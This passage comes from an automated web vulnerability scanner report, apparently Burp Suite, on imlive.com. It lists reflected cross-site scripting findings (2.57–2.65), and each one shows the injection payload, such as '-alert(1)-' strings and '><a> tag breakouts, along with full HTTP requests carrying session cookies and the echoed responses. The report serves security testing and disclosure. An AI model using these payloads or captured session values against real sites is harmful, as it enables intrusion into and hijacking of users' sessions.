X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 21781
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

2.57. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae13c"><a>8ef4c400f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /becomehost.aspx?ae13c"><a>8ef4c400f3a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 21593
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/becomehost.aspx?ae13c"><a>8ef4c400f3a=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.58. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1290d'><a>0243a0c9435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /categoryfs.asp?cat=232&1290d'><a>0243a0c9435=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:30 GMT
Connection: close
Content-Length: 18966
Vary: Accept-Encoding


<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232^1290d'><a>0243a0c9435=1&lr=1107816009&ud=0&pe=categoryfs.asp&qs=cat=232^1290d'>
...[SNIP]...

2.59. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61172'><a>3b9652ee722 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /categoryms.asp?cat=2&61172'><a>3b9652ee722=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:32 GMT
Connection: close
Content-Length: 21858
Vary: Accept-Encoding


<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2^61172'><a>3b9652ee722=1&lr=1107816009&ud=0&pe=categoryms.asp&qs=cat=2^61172'>
...[SNIP]...

2.60. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /celebrity-porn-stars/celebrity-events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db582'-alert(1)-'4b3c1d175fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /celebrity-porn-stars/celebrity-events/?db582'-alert(1)-'4b3c1d175fb=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 2667
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   War
...[SNIP]...
<script type="text/javascript">
function IAgree(){document.location.href='?meAgree=yes&redirect=%2fcelebrity-porn-stars%2fcelebrity-events%2f%3fdb582'-alert(1)-'4b3c1d175fb%3d1'; return false;}
function IDontAgree() { window.parent.location.href = "/"; return false; }
</script>
...[SNIP]...

2.61. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /disclaimer.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd26f'><a>d83acef05af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /disclaimer.asp?cd26f'><a>d83acef05af=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:16 GMT
Connection: close
Content-Length: 78891
Vary: Accept-Encoding


<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp?cd26f'><a>d83acef05af=1&lr=1107816009&ud=0&pe=disclaimer.asp&qs=cd26f'>
...[SNIP]...

2.62. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e80f3'-alert(1)-'c0da0968686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.aspx?e80f3'-alert(1)-'c0da0968686=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:43 GMT
Connection: close
Content-Length: 3338
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx?e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.63. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62a5"><a>8b3d580d15c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homepagems3.asp?e62a5"><a>8b3d580d15c=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=OCAEMBCBLGFDAAHFKEJLGHNK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:04:32 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10275


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<form onsubmit="return CheckForm(this);" method="post" action="homepagems3.asp?e62a5"><a>8b3d580d15c=1" style="margin:0;" name="frmLogin" ID="frmLogin">
...[SNIP]...

2.64. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ef1f'><a>f607da23703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homepagems3.asp?6ef1f'><a>f607da23703=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=DEAEMBCBEHGBLGDACDEEAKAD; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:04:49 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10275


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp?6ef1f'><a>f607da23703=1&lr=1107816009&ud=0&pe=homepagems3.asp&qs=6ef1f'>
...[SNIP]...

2.65. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ff1"><a>7cdd9e5718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/?66ff1"><a>7cdd9e5718=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:44 GMT
Connection: close
Content-Length: 40363
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/?66ff1"><a>7cdd9e5718=1');return false;" lang="en-US" hreflang="en-US">
